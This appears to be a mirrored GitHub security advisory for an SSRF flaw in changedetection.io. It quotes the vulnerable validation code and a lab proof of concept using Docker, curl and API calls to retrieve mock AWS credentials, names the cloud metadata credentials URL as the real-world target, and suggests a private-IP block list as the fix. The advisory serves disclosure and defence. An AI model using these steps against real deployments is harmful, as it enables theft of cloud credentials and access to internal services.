GHSA-3C45-4PJ5-CH7M
Vulnerability from github – Published: 2026-02-25 19:08 – Updated: 2026-02-25 19:08Summary
Changedetection.io is vulnerable to Server-Side Request Forgery (SSRF) because the URL validation function is_safe_valid_url() does not validate the resolved IP address of watch URLs against private, loopback, or link-local address ranges. An authenticated user (or any user when no password is configured, which is the default) can add a watch for internal network URLs such as:
http://169.254.169.254http://10.0.0.1/http://127.0.0.1/
The application fetches these URLs server-side, stores the response content, and makes it viewable through the web UI — enabling full data exfiltration from internal services.
This is particularly severe because:
- The fetched content is stored and viewable - this is not a blind SSRF
- Watches are fetched periodically - creating a persistent SSRF that continuously accesses internal resources
- By default, no password is set - the web UI is accessible without authentication
- Self-hosted deployments typically run on cloud infrastructure where
169.254.169.254returns real IAM credentials
Details
The URL validation function is_safe_valid_url() in changedetectionio/validate_url.py (lines 60–122) validates the URL protocol (http/https/ftp) and format using the validators library, but does not perform any DNS resolution or IP address validation:
# changedetectionio/validate_url.py:60-122
@lru_cache(maxsize=1000)
def is_safe_valid_url(test_url):
safe_protocol_regex = '^(http|https|ftp):'
# Check protocol
pattern = re.compile(os.getenv('SAFE_PROTOCOL_REGEX', safe_protocol_regex), re.IGNORECASE)
if not pattern.match(test_url.strip()):
return False
# Check URL format
if not validators.url(test_url, simple_host=True):
return False
return True # No IP address validation performed
The HTTP fetcher in changedetectionio/content_fetchers/requests.py (lines 83–89) then makes the request without any additional IP validation:
# changedetectionio/content_fetchers/requests.py:83-89
r = session.request(method=request_method,
url=url, # User-provided URL, no IP validation
headers=request_headers,
timeout=timeout,
proxies=proxies,
verify=False)
The response content is stored and made available to the user:
# changedetectionio/content_fetchers/requests.py:140-142
self.content = r.text # Text content stored
self.raw_content = r.content # Raw bytes stored
This validation gap exists in all entry points that accept watch URLs:
- Web UI:
changedetectionio/store/__init__.py:718 - REST API:
changedetectionio/api/watch.py:163, 428 - Import API:
changedetectionio/api/import.py:188
All use the same is_safe_valid_url() function, so a single fix addresses all paths.
PoC
Prerequisites
- A changedetection.io instance (Docker deployment)
- Network access to the instance (default port 5000)
Step 1: Deploy changedetection.io with an internal service
Create internal-service.py:
#!/usr/bin/env python3
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
class H(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps({
'Code': 'Success',
'AccessKeyId': 'AKIAIOSFODNN7EXAMPLE',
'SecretAccessKey': 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
'Token': 'FwoGZXIvYXdzEBYaDExampleSessionToken'
}).encode())
HTTPServer(('0.0.0.0', 80), H).serve_forever()
Create Dockerfile.internal:
FROM python:3.11-slim
COPY internal-service.py /server.py
CMD ["python3", "/server.py"]
Create docker-compose.yml:
version: "3.8"
services:
changedetection:
image: ghcr.io/dgtlmoon/changedetection.io
ports:
- "5000:5000"
volumes:
- ./datastore:/datastore
internal-service:
build:
context: .
dockerfile: Dockerfile.internal
Start the stack:
docker compose up -d
Step 2: Add a watch for the internal service
Open http://localhost:5000/ in a browser (no password required by default).
In the URL field, enter:
http://internal-service/
Click Watch and wait for the first check to complete.
Step 3: View the exfiltrated data
Click on the watch entry, then click Preview. The page displays the internal service’s response containing the simulated credentials:
{
"Code": "Success",
"AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
...
}
Step 4: Verify via API (alternative)
# Get the API key (visible in Settings page of the unauthenticated web UI)
API_KEY=$(docker compose exec changedetection cat /datastore/url-watches.json | \
python3 -c "import sys,json; print(json.load(sys.stdin)['settings']['application']['api_access_token'])")
# Create a watch via API
WATCH_RESPONSE=$(curl -s -X POST "http://localhost:5000/api/v1/watch" \
-H "x-api-key: $API_KEY" \
-H "Content-Type: application/json" \
-d '{"url": "http://internal-service/"}')
WATCH_UUID=$(echo "$WATCH_RESPONSE" | python3 -c "import sys,json; print(json.load(sys.stdin)['uuid'])")
echo "Watch created: $WATCH_UUID"
# Wait for the first fetch to complete
echo "Waiting 30s for first fetch..."
sleep 30
# Retrieve the exfiltrated data via API
LATEST_TS=$(curl -s "http://localhost:5000/api/v1/watch/$WATCH_UUID/history" \
-H "x-api-key: $API_KEY" | \
python3 -c "import sys,json; h=json.load(sys.stdin); print(sorted(h.keys())[-1]) if h else print('')")
echo "=== EXFILTRATED DATA ==="
curl -s "http://localhost:5000/api/v1/watch/$WATCH_UUID/history/$LATEST_TS" \
-H "x-api-key: $API_KEY"
Expected output — the internal service’s response containing simulated credentials:
{
"Code": "Success",
"AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
...
}
In a real cloud deployment, replacing http://internal-service/ with:
http://169.254.169.254/latest/meta-data/iam/security-credentials/
would return real AWS IAM credentials.
Impact
Who is impacted:
All self-hosted changedetection.io deployments, particularly those running on cloud infrastructure (AWS, GCP, Azure) where the instance metadata service at 169.254.169.254 is accessible.
What an attacker can do:
- Steal cloud credentials: Access the cloud metadata endpoint to obtain IAM credentials, service account tokens, or managed identity tokens
- Scan internal networks: Discover internal services by adding watches for internal IP ranges and observing responses
- Access internal services: Read data from internal APIs, databases, and admin interfaces that are not exposed to the internet
- Persistent access: Watches are fetched periodically on a configurable schedule, providing continuous access to internal resources
- No authentication required by default: The web UI has no password set by default, allowing any user with network access to exploit this vulnerability
Suggested Remediation
Add IP address validation to is_safe_valid_url() in changedetectionio/validate_url.py:
import ipaddress
import socket
BLOCKED_NETWORKS = [
ipaddress.ip_network('127.0.0.0/8'), # Loopback
ipaddress.ip_network('10.0.0.0/8'), # Private (RFC 1918)
ipaddress.ip_network('172.16.0.0/12'), # Private (RFC 1918)
ipaddress.ip_network('192.168.0.0/16'), # Private (RFC 1918)
ipaddress.ip_network('169.254.0.0/16'), # Link-local / Cloud metadata
ipaddress.ip_network('::1/128'), # IPv6 loopback
ipaddress.ip_network('fc00::/7'), # IPv6 unique local
ipaddress.ip_network('fe80::/10'), # IPv6 link-local
]
def is_private_ip(hostname):
"""Check if a hostname resolves to a private/reserved IP address."""
try:
for info in socket.getaddrinfo(hostname, None):
ip = ipaddress.ip_address(info[4][0])
for network in BLOCKED_NETWORKS:
if ip in network:
return True
except socket.gaierror:
return True # Block unresolvable hostnames
return False
Then add to is_safe_valid_url() before the final return True:
# Check for private/reserved IP addresses
parsed = urlparse(test_url)
if parsed.hostname and is_private_ip(parsed.hostname):
logger.warning(f"URL '{test_url}' resolves to a private/reserved IP address")
return False
An environment variable (e.g., ALLOW_PRIVATE_IPS=true) could be provided for users who intentionally need to monitor internal services.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "changedetection.io"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.54.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27696"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T19:08:18Z",
"nvd_published_at": "2026-02-25T05:17:26Z",
"severity": "HIGH"
},
"details": "## Summary\n\nChangedetection.io is vulnerable to Server-Side Request Forgery (SSRF) because the URL validation function `is_safe_valid_url()` does not validate the resolved IP address of watch URLs against private, loopback, or link-local address ranges. An authenticated user (or any user when no password is configured, which is the default) can add a watch for internal network URLs such as:\n\n- `http://169.254.169.254`\n- `http://10.0.0.1/`\n- `http://127.0.0.1/`\n\nThe application fetches these URLs server-side, stores the response content, and makes it viewable through the web UI \u2014 enabling full data exfiltration from internal services.\n\nThis is particularly severe because:\n\n- The fetched content is stored and viewable - this is not a blind SSRF\n- Watches are fetched periodically - creating a persistent SSRF that continuously accesses internal resources\n- By default, no password is set - the web UI is accessible without authentication\n- Self-hosted deployments typically run on cloud infrastructure where `169.254.169.254` returns real IAM credentials\n\n---\n\n## Details\n\nThe URL validation function `is_safe_valid_url()` in `changedetectionio/validate_url.py` (lines 60\u2013122) validates the URL protocol (http/https/ftp) and format using the `validators` library, but does not perform any DNS resolution or IP address validation:\n\n```python\n# changedetectionio/validate_url.py:60-122\n@lru_cache(maxsize=1000)\ndef is_safe_valid_url(test_url):\n\n safe_protocol_regex = \u0027^(http|https|ftp):\u0027\n\n # Check protocol\n pattern = re.compile(os.getenv(\u0027SAFE_PROTOCOL_REGEX\u0027, safe_protocol_regex), re.IGNORECASE)\n if not pattern.match(test_url.strip()):\n return False\n\n # Check URL format\n if not validators.url(test_url, simple_host=True):\n return False\n\n return True # No IP address validation performed\n```\n\nThe HTTP fetcher in `changedetectionio/content_fetchers/requests.py` (lines 83\u201389) then makes the request without any additional IP validation:\n\n```python\n# changedetectionio/content_fetchers/requests.py:83-89\nr = session.request(method=request_method,\n url=url, # User-provided URL, no IP validation\n headers=request_headers,\n timeout=timeout,\n proxies=proxies,\n verify=False)\n```\nThe response content is stored and made available to the user:\n\n```python\n# changedetectionio/content_fetchers/requests.py:140-142\nself.content = r.text # Text content stored\nself.raw_content = r.content # Raw bytes stored\n```\nThis validation gap exists in all entry points that accept watch URLs:\n\n- Web UI: `changedetectionio/store/__init__.py:718`\n- REST API: `changedetectionio/api/watch.py:163, 428`\n- Import API: `changedetectionio/api/import.py:188`\n\nAll use the same `is_safe_valid_url()` function, so a single fix addresses all paths.\n\n---\n\n## PoC\n\n### Prerequisites\n\n- A changedetection.io instance (Docker deployment)\n- Network access to the instance (default port 5000)\n\n### Step 1: Deploy changedetection.io with an internal service\n\nCreate `internal-service.py`:\n```python\n#!/usr/bin/env python3\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\u0027Content-Type\u0027, \u0027application/json\u0027)\n self.end_headers()\n self.wfile.write(json.dumps({\n \u0027Code\u0027: \u0027Success\u0027,\n \u0027AccessKeyId\u0027: \u0027AKIAIOSFODNN7EXAMPLE\u0027,\n \u0027SecretAccessKey\u0027: \u0027wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\u0027,\n \u0027Token\u0027: \u0027FwoGZXIvYXdzEBYaDExampleSessionToken\u0027\n }).encode())\nHTTPServer((\u00270.0.0.0\u0027, 80), H).serve_forever()\n```\n\nCreate `Dockerfile.internal`:\n```\nFROM python:3.11-slim\nCOPY internal-service.py /server.py\nCMD [\"python3\", \"/server.py\"]\n```\n\nCreate `docker-compose.yml`:\n```yaml\nversion: \"3.8\"\nservices:\n changedetection:\n image: ghcr.io/dgtlmoon/changedetection.io\n ports:\n - \"5000:5000\"\n volumes:\n - ./datastore:/datastore\n\n internal-service:\n build:\n context: .\n dockerfile: Dockerfile.internal\n```\n\nStart the stack:\n\n```bash\ndocker compose up -d\n```\n\n### Step 2: Add a watch for the internal service\n\nOpen `http://localhost:5000/` in a browser (no password required by default).\n\nIn the URL field, enter:\n```\nhttp://internal-service/\n```\nClick **Watch** and wait for the first check to complete.\n\n### Step 3: View the exfiltrated data\n\nClick on the watch entry, then click **Preview**. The page displays the internal service\u2019s response containing the simulated credentials:\n```json\n{\n \"Code\": \"Success\",\n \"AccessKeyId\": \"AKIAIOSFODNN7EXAMPLE\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n ...\n}\n```\n\u003cimg width=\"2291\" height=\"780\" alt=\"Screenshot 2026-02-16 084212\" src=\"https://github.com/user-attachments/assets/115b69fb-ea10-4c47-a38c-409ede0e03cd\" /\u003e\n\n### Step 4: Verify via API (alternative)\n```bash\n# Get the API key (visible in Settings page of the unauthenticated web UI)\nAPI_KEY=$(docker compose exec changedetection cat /datastore/url-watches.json | \\\n python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027settings\u0027][\u0027application\u0027][\u0027api_access_token\u0027])\")\n\n# Create a watch via API\nWATCH_RESPONSE=$(curl -s -X POST \"http://localhost:5000/api/v1/watch\" \\\n -H \"x-api-key: $API_KEY\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"url\": \"http://internal-service/\"}\u0027)\n\nWATCH_UUID=$(echo \"$WATCH_RESPONSE\" | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027uuid\u0027])\")\necho \"Watch created: $WATCH_UUID\"\n\n# Wait for the first fetch to complete\necho \"Waiting 30s for first fetch...\"\nsleep 30\n\n# Retrieve the exfiltrated data via API\nLATEST_TS=$(curl -s \"http://localhost:5000/api/v1/watch/$WATCH_UUID/history\" \\\n -H \"x-api-key: $API_KEY\" | \\\n python3 -c \"import sys,json; h=json.load(sys.stdin); print(sorted(h.keys())[-1]) if h else print(\u0027\u0027)\")\n\necho \"=== EXFILTRATED DATA ===\"\ncurl -s \"http://localhost:5000/api/v1/watch/$WATCH_UUID/history/$LATEST_TS\" \\\n -H \"x-api-key: $API_KEY\"\n```\nExpected output \u2014 the internal service\u2019s response containing simulated credentials:\n```json\n{\n \"Code\": \"Success\",\n \"AccessKeyId\": \"AKIAIOSFODNN7EXAMPLE\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n ...\n}\n```\n\nIn a real cloud deployment, replacing `http://internal-service/` with:\n\n```bash\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\n```\nwould return real AWS IAM credentials.\n\n\u003cimg width=\"1140\" height=\"607\" alt=\"Screenshot 2026-02-16 084407\" src=\"https://github.com/user-attachments/assets/cb1f5c02-6604-49e6-9e26-13406b190b45\" /\u003e\n\n---\n\n## Impact\n\n**Who is impacted:** \nAll self-hosted changedetection.io deployments, particularly those running on cloud infrastructure (AWS, GCP, Azure) where the instance metadata service at `169.254.169.254` is accessible.\n\n**What an attacker can do:**\n\n- **Steal cloud credentials:** Access the cloud metadata endpoint to obtain IAM credentials, service account tokens, or managed identity tokens\n- **Scan internal networks:** Discover internal services by adding watches for internal IP ranges and observing responses\n- **Access internal services:** Read data from internal APIs, databases, and admin interfaces that are not exposed to the internet\n- **Persistent access:** Watches are fetched periodically on a configurable schedule, providing continuous access to internal resources\n- **No authentication required by default:** The web UI has no password set by default, allowing any user with network access to exploit this vulnerability\n\n---\n\n### Suggested Remediation\n\nAdd IP address validation to `is_safe_valid_url()` in `changedetectionio/validate_url.py`:\n\n```python\nimport ipaddress\nimport socket\n\nBLOCKED_NETWORKS = [\n ipaddress.ip_network(\u0027127.0.0.0/8\u0027), # Loopback\n ipaddress.ip_network(\u002710.0.0.0/8\u0027), # Private (RFC 1918)\n ipaddress.ip_network(\u0027172.16.0.0/12\u0027), # Private (RFC 1918)\n ipaddress.ip_network(\u0027192.168.0.0/16\u0027), # Private (RFC 1918)\n ipaddress.ip_network(\u0027169.254.0.0/16\u0027), # Link-local / Cloud metadata\n ipaddress.ip_network(\u0027::1/128\u0027), # IPv6 loopback\n ipaddress.ip_network(\u0027fc00::/7\u0027), # IPv6 unique local\n ipaddress.ip_network(\u0027fe80::/10\u0027), # IPv6 link-local\n]\n\ndef is_private_ip(hostname):\n \"\"\"Check if a hostname resolves to a private/reserved IP address.\"\"\"\n try:\n for info in socket.getaddrinfo(hostname, None):\n ip = ipaddress.ip_address(info[4][0])\n for network in BLOCKED_NETWORKS:\n if ip in network:\n return True\n except socket.gaierror:\n return True # Block unresolvable hostnames\n return False\n```\n\nThen add to `is_safe_valid_url()` before the final `return True`:\n\n```python\n# Check for private/reserved IP addresses\nparsed = urlparse(test_url)\nif parsed.hostname and is_private_ip(parsed.hostname):\n logger.warning(f\"URL \u0027{test_url}\u0027 resolves to a private/reserved IP address\")\n return False\n```\n\nAn environment variable (e.g., `ALLOW_PRIVATE_IPS=true`) could be provided for users who intentionally need to monitor internal services.",
"id": "GHSA-3c45-4pj5-ch7m",
"modified": "2026-02-25T19:08:18Z",
"published": "2026-02-25T19:08:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-3c45-4pj5-ch7m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27696"
},
{
"type": "WEB",
"url": "https://github.com/dgtlmoon/changedetection.io/commit/fe7aa38c651d73fe5f41ce09855fa8f97193747b"
},
{
"type": "PACKAGE",
"url": "https://github.com/dgtlmoon/changedetection.io"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "changedetection.io is Vulnerable to SSRF via Watch URLs"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.